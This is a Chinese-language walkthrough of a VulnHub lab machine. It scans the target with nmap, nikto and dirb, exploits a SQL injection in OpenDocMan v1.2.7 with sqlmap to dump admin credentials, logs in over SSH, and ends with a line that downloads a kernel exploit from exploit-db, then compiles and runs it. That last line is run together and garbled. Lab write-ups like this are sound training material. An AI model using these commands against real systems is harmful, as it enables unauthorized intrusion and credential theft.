前言

最近發現了一個不錯的靶場，裡面各種滲透測試的虛擬機器，大家可以下載進行嘗試學習。還有就是一個漏洞利用存檔，可以找到很多我們可以利用的學習的東西。

靶場:

https://www.vulnhub.com

漏洞利用存檔:

https://www.exploit-db.com

0x01 資訊蒐集

首先就是確定我們靶機的目標

nmap -sP -T5 192.168.0.1/24

 通過前面的步驟，我們對目標進行具體的埠掃描以及作業系統識別，發現開啟有80，22以及6667埠。

nmap -sV -p- -A -O -T4 192.168.0.170

目錄掃描 繼續對目標進行敏感目錄掃描，御劍等工具都可以。這裡我使用KALI的nikto以及dirb命令進行簡單的目錄掃描。

 nikto -host http://192.168.0.170

或者

dirb http://192.168.0.170

0x02 漏洞發現

訪問IP之後的頁面，發現並沒有什麼特別的地方，於是只能檢視原始碼，點選超連結進行檢視。 

在連結的地方竟然發現了祕密的地方，於是訪問之 

此處是一個登入介面，我們可以嘗試註冊一個使用者進行登入，但只是一個遊客的形式。 

我們註冊一個使用者進行登入，還有有很多功能的，於是可以進行更多的嘗試。 

在下面發現OpenDocMan v1.2.7， OpenDocMan是一個功能完整的基於Web的文件管理系統(DMS)，於是找找OpenDocMan v1.2.7所公佈的一些可以利用的漏洞。

現可以利用的好幾個漏洞，於是先行嘗試sql注入

0x03 漏洞利用

經過簡單的測試發現

http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user

處確實注入。

是直接拿出神器Sqlmap進行注入。

sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbs

經過常見的那幾個命令我們可以成功的拿到登入名和密碼。

sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs --tables
sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_admin --columns

sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user --columns`
sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user -C "username,password" --dump

使用者名稱webmin，密碼b78aae356709f8c31118ea613980954b，明文為webmin

0x04 許可權提升

經過前面埠掃描可以發現，22埠發放著，可以進行ssh連線。

ssh webmin@192.168.0.170 

　檢視許可權發現是普通使用者的許可權，所以得繼續進行提權操作。獲取到低許可權SHELL後我們通常做下面幾件事：

• 檢測作業系統的發行版本

• 檢視核心版本

• 檢測當前使用者許可權

• 列舉Suid檔案

• 檢視已經安裝的包，程式，執行的服務，過期版本的有可能有漏洞

檢視系統的版本號資訊

lsb_release -a

檢視系統核心資訊

uname -r

我們可以看到此作業系統採用的是Ubuntu 14.04.4 LTS，核心版本是3.13.0-24-generic，首先想到的就是去漏洞庫尋找有沒有可以用的exploit。

下載漏洞exploit

wget https://www.exploit-db.com/download/37292mv 37292 shell.cgcc -o shell shell.c./shell